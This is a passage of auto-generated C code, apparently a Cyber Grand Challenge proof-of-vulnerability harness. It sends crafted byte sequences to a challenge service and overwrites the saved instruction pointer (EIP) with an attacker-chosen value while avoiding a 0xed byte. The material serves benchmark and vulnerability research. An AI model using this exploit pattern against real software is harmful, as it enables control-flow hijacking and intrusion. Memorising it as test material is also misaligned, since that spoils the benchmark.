write_00004_00000[] = "\x43\x43\x43\x43"; static unsigned int write_00004_00000_len = 4; unsigned char *write_00004 = NULL; unsigned int write_00004_len = 0; write_00004 = append_buf(write_00004, &write_00004_len, write_00004_00000, write_00004_00000_len); if (write_00004_len > 0) { transmit_all(1, write_00004, write_00004_len); } free(write_00004); } while (0); do { // EIP (have to prevent 0xed from each of the 4 bytes) //*** writing data unsigned int eip = t1vals.ipval | no_ed; unsigned char *write_00005 = NULL; unsigned int write_00005_len = 0; write_00005 = append_buf(write_00005, &write_00005_len, (unsigned char*)&eip, 4); if (write_00005_len > 0) { transmit_all(1, write_00005, write_00005_len); } free(write_00005); } while (0); do { //*** writing data static unsigned char write_00006_00000[] = "\xed"; static unsigned int write_00006_00000_len = 1; unsigned char *write_00006 = NULL; unsigned int write_00006_len = 0; write_00006 = append_buf(write_00006, &write_00006_len, write_00006_00000, write_00006_00000_len); if (write_00006_len > 0) { transmit_all(1, write_00006, write_00006_len); } free(write_00006); } while (0); do { unsigned char *read_00000; unsigned int read_00000_len; unsigned int read_00000_ptr = 0; //**** length cgc_read read_00000_len = 2; read_00000 = (unsigned char*)malloc(read_00000_len); int read_00000_res = length_read(0, read_00000, read_00000_len); if (read_00000_res) {} //silence unused variable warning free(read_00000); if (read_00000_ptr) {} //silence unused variable warning if any } while (0); do { //*** writing data static unsigned char write_00007_00000[] = "\xc4\xec\x4e\xee"; static unsigned int write_00007_00000_len = 4; unsigned char *write_00007 = NULL; unsigned int write_00007_len = 0; write_00007 = append_buf(write_00007, &write_00007_len, write_00007_00000, write_00007_00000_len); if (write_00007_len > 0) { transmit_all(1, write_00007, write_00007_len); } free(write_00007); } while (0); do { //*** writing data static unsigned char write_00008_00000[] = "\x38\x31\x39\x36\x33\x38\x39\x30"; static unsigned int write_00008_00000_len = 8; unsigned char *write_00008 = NULL; unsigned int write_00008_len = 0; write_00008 = append_buf(write_00008, &write_00008_len, write_00008_00000, write_00008_00000_len); if (write_00008_len > 0) { transmit_all(1, write_00008, write_00008_len); } free(write_00008); } while (0); do { unsigned char *read_00001; unsigned int read_00001_len; unsigned int read_00001_ptr = 0; //**** length cgc_read read_00001_len = 4; read_00001 = (unsigned char*)malloc(read_00001_len); int read_00001_res = length_read(0, read_00001, read_00001_len); if (read_00001_res) {} //silence unused variable warning free(read_00001); if (read_00001_ptr) {} //silence unused variable warning if any } while (0); do { unsigned char *read_00002; unsigned int read_00002_len; unsigned int read_00002_ptr = 0; //**** length cgc_read read_00002_len = 4; read_00002 = (unsigned char*)malloc(read_00002_len); int read_00002_res = length_read(0, read_00002, read_00002_len); if (read_00002_res) {} //silence unused variable warning free(read_00002); if (read_00002_ptr) {} //silence unused variable warning if any } while (0); do { unsigned char *read_00003; unsigned int read_00003_len; unsigned int read_00003_ptr = 0; //**** length cgc_read read_00003_len = 141; read_00003 = (unsigned char*)malloc(read_00003_len); int read_00003_res = length_read(0, read_00003, read_00003_len); if (read_00003_res) {} //silence unused variable warning //**** cgc_read match data static unsigned char match_00003_00000[] = "\x47\x71\x56\x59\x4e\x4e\x43\x54\x64\x46\x54\x6f\x4a\x67\x62\x6e" "\x4b\x56\x73\x4e\x72\x4a\x54\x72\x42\x45\x44\x65\x50\x57\x7a\x53" "\x4b\x6a\x51\x51\x68\x75\x53\x6f\x74\x75\x71\x49\x4a\x70\x63\x67" "\x52\x49\x76\x74\x4a\x70\x49\x4d\x4c\x4b\x62\x71\x44\x79\x76\x6a" "\x4f\x53\x41\x47\x66\x75\x46\x6c\x4f\x41\x51\x66\x54\x4d\x64\x4e" "\x4d\x7a\x52\x56\x43\x48\x78\x64\x4a\x43\x5a\x53\x4a\x52\x52\x61" "\x4c\x63\x7a\x43\x41\x69\x6c\x66\x4f\x76\x64\x62\x6e\x4b\x6e\x48" "\x77\x6a\x51\x43\x7a\x6c\x4a\x61\x66\x4f\x47\x68\x6a\x5a\x5a\x41" "\x4d\x4d\x4d\x4d\x43\x43\x43\x43\x45\x45\x45\x45\xed"; read_00003_ptr += data_match(read_00003 + read_00003_ptr, read_00003_len - read_00003_ptr, match_00003_00000, 141); free(read_00003); if (read_00003_ptr) {} //silence unused variable warning if any } while (0); do { unsigned char *read_00004; unsigned int read_00004_len; unsigned int read_00004_ptr = 0; //**** length cgc_read read_00004_len = 2; read_00004 = (unsigned char*)malloc(read_00004_len); int read_00004_res = length_read(0, read_00004, read_00004_len); if (read_00004_res) {} //silence unused variable warning free(read_00004); if (read_00004_ptr) {} //silence unused variable warning if any } while (0); do { //*** writing data static unsigned char write_00009_00000[] = "\xff\xff\xff\xff"; static unsigned int write_00009_00000_len = 4; unsigned char *write_00009 = NULL; unsigned int write_00009_len = 0; write_00009 = append_buf(write_00009, &write_00009_len, write_00009_00000, write_00009_00000_len); if (write_00009_len > 0) { transmit_all(1, write_00009, write_00009_len); } free(write_00009); } while (0); do { unsigned char *read_00005; unsigned int read_00005_len; unsigned int read_00005_ptr = 0; //**** length cgc_read read_00005_len = 2; read_00005 = (unsigned char*)malloc(read_00005_len); int read_00005_res = length_read(0, read_00005, read_00005_len); if (read_00005_res) {} //silence unused variable warning free(read_00005); if (read_00005_ptr) {} //silence unused variable warning if any } while (0); }